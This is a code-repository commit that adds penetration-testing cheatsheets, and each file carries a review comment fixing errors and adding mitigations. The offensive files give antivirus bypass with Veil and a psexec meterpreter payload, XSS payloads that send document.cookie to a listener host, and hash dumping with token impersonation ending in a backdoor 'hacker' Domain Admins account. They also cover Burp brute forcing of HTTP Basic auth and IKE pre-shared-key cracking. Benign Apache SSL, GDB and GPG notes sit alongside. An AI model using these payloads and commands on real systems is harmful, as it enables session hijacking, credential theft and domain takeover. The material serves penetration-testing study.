Cheatsheets
Added more cheatsheets
1nPr0c committed Sep 11, 2014
1 parent 0204cf3 commit 95f0350
Showing 19 changed files with 953 additions and 15 deletions.
14 changes: 14 additions & 0 deletions Cheatsheet_AVBypass.txt
@@ -0,0 +1,14 @@
1. Generate executable using Veil.

2. In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp)

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe
EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe
msf exploit(psexec) > exploit
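Review bot: step 2 names windows/meterpreter/reverse_tcp, but the msfconsole transcript never issues `set PAYLOAD` or `set LHOST`, so the listed commands do not match their description; either add those two lines or drop the payload mention. The values RHOST 192.168.0.2, SMBUser user, SMBPass pass and /root/Desktop/Misc/Veil-master/payload.exe are lab-specific and should be marked as placeholders rather than left to be copied literally.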
42 changes: 42 additions & 0 deletions Cheatsheet_ApacheSSL.txt
@@ -0,0 +1,42 @@
# Enabling Self signed certificates on local website

1. Install OpenSSL

2. Run the following command to generate the self signed SSL certificates:

openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout mysitename.key -out mysitename.crt

3. You will be prompted to enter your organizational information and a common name. The common name should be the fully qualified domain name for the site you are securing (www.mydomain.com). You can leave the email address, challenge password, and optional company name blank. When the command is finished running, it will create two files: a mysitename.key file and a mysitename.crt self signed certificate file valid for 365 days.

4. Install the self signed certificate:

Make a backup copy of /etc/apache2/sites-enabled/000-default and open the original in a text editor.

Add the lines in bold below. <VirtualHost 192.168.0.1:443>
DocumentRoot /var/www/website
ServerName www.domain.com
SSLEngine on
SSLCertificateFile /etc/ssl/certs/primary.crt
SSLCertificateKeyFile /etc/ssl/certs/private.key
SSLCertificateChainFile /etc/ssl/certs/intermediate.crt
</VirtualHost>

Change the names of the files and paths to match your certificate files. Save the changes and exit the text editor.

5. Enable mod_ssl under apache using the following commands:

a2enmod ssl
/etc/init.d/apache2 restart

## Add ServerName localhost

to /etc/apache2/apache2.conf


More information:
https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html
http://www.akadia.com/services/ssh_test_certificate.html
https://www.sslshopper.com/apache-server-ssl-installation-instructions.html
http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server


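Review bot: the VirtualHost block in step 4 does not match the files step 2 produces: step 2 writes mysitename.key and mysitename.crt, while the config points at /etc/ssl/certs/primary.crt, private.key and intermediate.crt, and a self-signed certificate has no intermediate, so `SSLCertificateChainFile` should be dropped instead of being left for the reader to guess at. The private key should not live in /etc/ssl/certs, which is world-readable by convention; put it under /etc/ssl/private with mode 0600 (`chmod 600 mysitename.key`), and note that `-nodes` leaves the key unencrypted on disk. "Add the lines in bold below" carries no bold in a plain-text file; name the lines instead (`SSLEngine on` and the three SSL* directives). The `## Add ServerName localhost` heading is really the next step after step 5; number it as step 6 so the procedure reads in order.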
12 changes: 12 additions & 0 deletions Cheatsheet_CookieStealing.txt
@@ -0,0 +1,12 @@
[+] Cookie Stealing:

[-] Start Web Service

python -m SimpleHTTPServer 80

[-] Use one of the following XSS payloads:

<script>document.location="http://192.168.0.60/?c="+document.cookie;</script>
<script>new Image().src="http://192.168.0.60/index.php?c="+document.cookie;</script>


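Review bot: the second payload requests /index.php, but `python -m SimpleHTTPServer` serves static files only and never executes PHP, so the cookie value is only recoverable from the server's access log; say so, or drop the .php path so both payloads are consistent. `SimpleHTTPServer` is the Python 2 module name (Python 3 renamed it `http.server`), which deserves a note beside the command. The file should also state what both payloads depend on: they read `document.cookie`, which is exactly what the `HttpOnly` cookie attribute withholds from script, so that attribute is the mitigation to document here.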
30 changes: 30 additions & 0 deletions Cheatsheet_DomainAdminExploitation.txt
@@ -0,0 +1,30 @@
[+] After compromising a Windows machine:

[>] List the domain administrators:
From Shell - net group "Domain Admins" /domain

[>] Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE

[>] Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts 10.10.10.0/24
msf > set threads 8
msf > run

msf> spool off

[>] Compromise Admin's box
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\adaministrator
meterpreter > getuid
meterpreter > shell

C:\> whoami
mydom\adaministrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain
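Review bot: `adaministrator` is misspelled on both the `impersonate_token` line and the `whoami` output, so the impersonate line would fail as written. The `smbpass` value aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 is the LM:NTLM pair for an empty password; label it as a placeholder to be replaced with the hash taken from the smart_hashdump output of the previous step. The heading "Compromise Admin's box" is misleading: the incognito steps impersonate a domain admin token already present on the compromised host rather than reaching the admin's own machine. Minor style: `spool /tmp/enumdomainusers.txt` lacks the `msf >` prompt and `msf> spool off` lacks the space. From a detection standpoint, the last two commands create a domain account and add it to Domain Admins, both of which the domain controller logs in the Security log (event 4720 for the user creation, 4728 for the group membership change); the cheatsheet should flag that these are loud, logged actions.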
58 changes: 58 additions & 0 deletions Cheatsheet_GDB.txt
@@ -0,0 +1,58 @@
set disassembly-flavor intel

$ cat ~/.bash_aliases | grep gdb
alias gdb='gdb -quiet'

Running gdb
------------------
$ gdb - run, then use file command to load object
$ gdb -quiet - supress copyright information
$ gdb object - normal debug
$ gdb object core - analyze core dump
$ gdb object pid - attach to running process

General commands
------------------
set args - set program arguments
show args - show program arguments
run - run the program
run < file - run with input from file
set follow-exec-mode new/sam - set debugger response to an exec call
set write - set write into executables
set write off - unset write int oexecutables
continue - continue running until break
finish - execute until current stack frame ends
source FILE - read commands from script file
shell [cmd] - run cmd in a shell
display /5i $eip - display expression everytime execution stops
undisplay <expr #> - undisplay expression number
info functions - list all the functions
info variables - list all the variables
info registers - list most common registers
info all-registers - list all registers
info display - print the list of displayed expressions
backtrace - print backtrace of all stack frames
where - same as backtrace
set disassembly-flavor intel - set disassembly style to intel/att
define hook-[cmd] - actions to execute before command
define hooopost-[cmd] - actions to execute after command
define hook-stop - actions to execute when execution stops

Breakpoints
------------------
info breakpoints - list all breakpoints
break [func] - break function name
break *[addr] - break at address
delete [bnum] - delete breakpoint bnum
break if [cond] - break if condition
ignore [bnum] [count] - ignore breakpoint bnum count times
condition [bnum] $eax == 0x22 - add condition for breakpoint 1
condition [bnum] - delete condition for breakpoint 1

Watchpoints
------------------
info watchpoints - list all the watchpoint
watch variable==value - break when variable equals ..
watch $eax == 0x0000ffaa - break when register equals ..
rwatch *[addr] - break on read memory location
awatch *[addr] - break on read/write memory location
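Review bot: several commands are mistyped and gdb would not accept them as written: `set follow-exec-mode new/sam` should read `new/same`, `define hooopost-[cmd]` should be `hookpost-`, `set write` (to enable) is `set write on`, and "unset write int oexecutables" should be "unset write into executables"; `supress` is `suppress`. The `condition` entries say "breakpoint 1" while the command takes `[bnum]`, and `break if [cond]` needs a location (`break [loc] if [cond]`). The orphan `set disassembly-flavor intel` on the first line needs a caption saying it belongs in ~/.gdbinit, next to the `.bash_aliases` excerpt that follows it. `display /5i $eip` and `watch $eax == 0x0000ffaa` are 32-bit examples; note that on x86_64 the registers are `$rip` and `$rax`.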
14 changes: 14 additions & 0 deletions Cheatsheet_GPG.txt
@@ -0,0 +1,14 @@
Encrypt
------------
sudo gpg -e ~/Desktop/file.doc

This will prompt you to type in the persons name (public key) to encrypt with.

Decrypt
-----------
sudo gpg -d ~/Desktop/file.doc.pgp > ~/Desktop/file.doc


Import other users' public keys by using:

sudo gpg --import <key>
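Review bot: `sudo` is wrong on all three commands and makes them inconsistent with each other: run as root, gpg uses root's keyring under ~root/.gnupg, so the key imported with `sudo gpg --import` and the "person's name" looked up by `sudo gpg -e` live in a keyring the invoking user never sees, and the decrypt step needs the user's own private key; drop `sudo` throughout. The file names also do not line up: `gpg -e file.doc` writes `file.doc.gpg`, but the decrypt line reads `file.doc.pgp`. The `-e` line should mention `-r <recipient>` as the non-interactive form of the prompt it describes, and `<key>` in `gpg --import <key>` should be described as a public key file (for example an exported .asc).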
40 changes: 40 additions & 0 deletions Cheatsheet_HTTPBasicAuth.txt
@@ -0,0 +1,40 @@
[>] HTTP Basic Authentication Dictionary and Brute-force attacks with Burp Suite

http://www.dailysecurity.net/2013/03/22/http-basic-authentication-dictionary-and-brute-force-attacks-with-burp-suite/

Burp Suite against HTTP Basic authentication

To implement the attack you need to capture one authentication request with Burp Proxy and send it to Burp Intruder.

Mark only the Base64 encoded string and click Add button to put the markers around it.

Dictionary attack

For the dictionary attack I’m using custom iterator intruder option. It allows you to generate your own custom payload string consisting from several substrings. For every substring you could specify separator which is basically e suffix. The Intruder calls those substrings “positions”.
Following this logic in position 1 we would like to load an username followed by separator semicolumn and then load password for position 2.
Go to Payload tab and select Custom iterator option from Payload type dropdown box.
Burp Suite Custom Iterator
Select position 1 from the Position dropdown box and load your usernames list in List items for position 1 listbox. Put semicolumn in the Separator for position 1 text box.
Position 1 list and separator option
Select position 2 from the Position dropdown box and load your passwords list in List items for position 2 listbox.
Position 2
After you’ve set your two positions you need to tell the Intruder to encode the payload string using Base64 encoding. Go to Payload processing sections and click Add button. Select Payload encoding option and then Base64.
PayloadProcessin_AddRule_Encode
PayloadProcessingEncode
By default Burp Intruder URL encodes the payload. Base64 strings often contain = symbol. That is why it is a good idea to exclude it from the list of URL characters for encoding.
That’s it. You can start the Intruder attack.

Bruteforce attack

The method I’m using for the bruteforce attack is targeting only one username per Intruder attack.
Select Brute forcer from the Payload type dropdown and then set the length of the password and the characterset you would like the Intruder to use while constructing the password strings.
Burp Intruder Brute forcer
In order to specify the username you would like to brute-force you need to set Payload processing rule. Add new rule with Add prefix type and fill up the username followed by semi-column.
Burp Intruder Add Prefix
Add another rule to encode the payload using Base64. And finally remove = from the list of symbols subject of URL encoding.
Burp Sutei Bruteforce Attack Settings
Done! You can start the Intruder attack!

[>] Automated Security Analyser for ASP.NET Websites

https://asafaweb.com
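Review bot: "semicolumn" (position 1 separator) and "semi-column" (Add prefix rule) are wrong in substance, not just spelling: HTTP Basic credentials are `username:password` Base64-encoded, so the separator must be a colon (`:`); a semicolon would produce an invalid credential for every payload. Wording: "consisting from" should be "consisting of", "e suffix" should be "a suffix", "an username" should be "a username", and "Burp Sutei" is "Burp Suite". Lines such as "Burp Suite Custom Iterator", "Position 1 list and separator option", "PayloadProcessin_AddRule_Encode" and "PayloadProcessingEncode" are image captions copied from the linked blog post and read as stray text in a .txt cheatsheet; mark them as figure references or remove them. This is also where the defensive note belongs: nothing in Basic auth itself throttles guesses, so server-side lockout or rate limiting is the control these attacks test. The closing `[>] Automated Security Analyser for ASP.NET Websites` / asafaweb.com entry has nothing to do with HTTP Basic auth and belongs in a separate file.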
60 changes: 60 additions & 0 deletions Cheatsheet_IKEScan_.txt
@@ -0,0 +1,60 @@
Aggressive Mode VPN -- IKE-Scan, PSK-Crack

In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump and start dictionary or brute force attack against this hash to recover the PSK.

This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts IKE aggressive mode is not very secure.

It looks like this:

$ ike-scan 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797)
Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec).
0 returned handshake; 1 returned notify

----------------------------------------------------------------------------------------------------------------------------------

$ sudo ike-scan -A 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/)

192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes)

----------------------------------------------------------------------------------------------------------------------------------

To save with some output:

$ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key

Once you have you psk file to crack you're stuck with two options psk-crack and cain

----------------------------------------------------------------------------------------------------------------------------------

Brute force:

$psk-crack -b 5 192-168-207-134key
Running in brute-force cracking mode
Brute force with 36 chars up to length 5 will take up to 60466176 iterations

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec)

Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset=

$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
Running in brute-force cracking modde
Brute force with 63 chars up to length 5 will take up to 992436543 iterations

----------------------------------------------------------------------------------------------------------------------------------

Dictionary attack:

$psk-crack -d /path/to/dictionary 192-168-207-134key
Running in dictionary cracking mode

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec)

----------------------------------------------------------------------------------------------------------------------------------

References: http://carnal0wnage.attackresearch.com/2011/12/aggressive-mode-vpn-ike-scan-psk-crack.html
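Review bot: the second `--charset` example carries a duplicated `3` (`01233456789...`), which is why the tool reports 63 characters rather than the 62 of the intended digits plus upper and lower case; fix the string, and `modde` on the following line is `mode`. Style: `$psk-crack` (twice) is missing the space after the prompt, and `-P192-168-207-134key` deserves a comment that `-P` takes its file name attached with no space, since readers will otherwise "fix" it; `--id=myid` should be marked as a placeholder, and "Once you have you psk file" is "your". The text ends at "IKE aggressive mode is not very secure" without naming the mitigation it implies: disable aggressive mode in favour of Main Mode or move from PSK to certificate-based authentication, and where a PSK must stay, use long random keys well beyond the 5-character keyspaces whose iteration counts are shown above.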

0 comments on commit 95f0350
